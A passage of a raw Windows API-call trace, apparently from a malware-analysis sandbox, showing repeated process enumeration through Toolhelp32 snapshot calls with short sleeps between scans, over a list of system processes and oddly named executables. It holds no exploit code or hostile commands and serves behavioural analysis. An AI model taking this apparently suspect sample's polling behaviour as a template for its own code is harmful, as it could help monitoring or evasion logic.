th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0228.712] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0228.713] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.713] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.714] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.714] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.715] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0228.715] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0228.716] CloseHandle (hObject=0x520) returned 1 [0228.716] Sleep (dwMilliseconds=0x64) [0228.814] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x520 [0228.816] Process32First (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.817] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0228.817] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0228.818] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0228.818] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0228.818] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0228.819] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0228.819] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0228.820] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0228.820] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0228.821] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.821] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.822] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.822] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.823] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.823] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0228.824] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.824] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.824] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0228.825] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0228.825] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0228.826] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.826] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0228.827] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0228.827] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0228.828] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0228.828] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0228.829] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0228.829] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0228.830] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0228.830] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0228.831] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0228.831] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0228.832] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0228.832] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0228.832] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0228.833] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0228.833] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0228.834] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0228.834] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0228.835] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0228.835] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0228.836] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0228.836] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0228.837] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0228.837] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.838] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0228.838] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.838] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0228.839] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.839] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0228.840] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0228.840] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.841] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.841] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.842] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.842] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0228.842] CloseHandle (hObject=0x520) returned 1 [0228.843] Sleep (dwMilliseconds=0x64) [0228.939] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x520 [0228.941] Process32First (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.941] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0228.942] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0228.942] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0228.943] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0228.943] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0228.944] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0228.944] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0228.945] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0228.945] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0228.946] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.946] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.947] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.947] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.948] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.948] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0228.948] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.949] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.949] Process32Next (in: hSnapshot=0x520, lppe=0x44cfb90 | out: lppe=0x44cfb90*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, 